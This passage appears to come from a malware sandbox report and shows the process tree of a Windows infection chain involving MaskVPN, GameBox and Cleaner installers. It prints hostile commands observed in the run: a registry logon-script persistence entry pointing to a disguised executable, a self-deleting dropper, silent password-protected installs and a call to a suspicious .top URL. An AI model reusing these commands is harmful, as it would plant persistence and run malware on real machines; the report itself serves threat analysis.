                                                                                                                                                                PID:6380
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4812
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                      tapinstall.exe remove tap0901
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                      PID:7536
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4948
                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        PID:8152
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:7592
                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:2952
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LP09A.tmp\Inlog.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LP09A.tmp\Inlog.tmp" /SL5="$10362,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                PID:2156
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-EQNNT.tmp\Setup.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-EQNNT.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6848
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-96HDQ.tmp\Setup.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-96HDQ.tmp\Setup.tmp" /SL5="$10522,17361543,721408,C:\Users\Admin\AppData\Local\Temp\is-EQNNT.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:7040
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-R7LL8.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:6432
                                                                                                                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-R7LL8.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            PID:2308
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6736
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:9028
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-R7LL8.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-R7LL8.tmp\{app}\vdi_compiler"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:8980
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-R7LL8.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6648
                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                      ping localhost -n 4
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                      PID:7160
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:1044
                                                                                                                                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:7728
                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              PID:5296
                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4752
                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                PID:5460
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 01F1E4AE23DFA361EB91B61185A83293 C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4752
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding F5F7E2D5FB80EBB414AE3594AC2B32D6
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:4108
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 7E6A2A001D4700ECD79F71C423323E77 C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:4904
                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 1E3EDE2BCE403FA8242301FCDA111BCF C
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:7144
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:8992
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                    PID:7104
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:5988
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x194,0x1ac,0x1a8,0x1cc,0x1a4,0x7ff9b416dec0,0x7ff9b416ded0,0x7ff9b416dee0
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:9140
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff756689e70,0x7ff756689e80,0x7ff756689e90
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:8684
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=1924 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:6872
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:8996
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1832 /prefetch:2
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1412
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  PID:4340
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2696 /prefetch:1
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  PID:5096
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=3092 /prefetch:8
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:9560
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3132 /prefetch:2
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:9712
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=3616 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:10208
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=3672 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:10228
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=3624 /prefetch:8
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:9004
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1816,11660772419827333381,6546476907524073349,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5988_1468502733" --mojo-platform-channel-handle=1892 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:10056
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_7DA4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:7200
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:7576
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:7596
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        PID:5712
                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{19fd957c-ed8a-224a-a6a4-f7291e0e3874}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:6008
                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          PID:7620
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:6712
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:6828
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        PID:7272
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:6716
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:8356
                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          PID:8584
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:7828
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:8264
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6544
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:584
                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:8712
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:5560
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:8948
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6332
                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                PID:6936
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:9524
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                1⤵
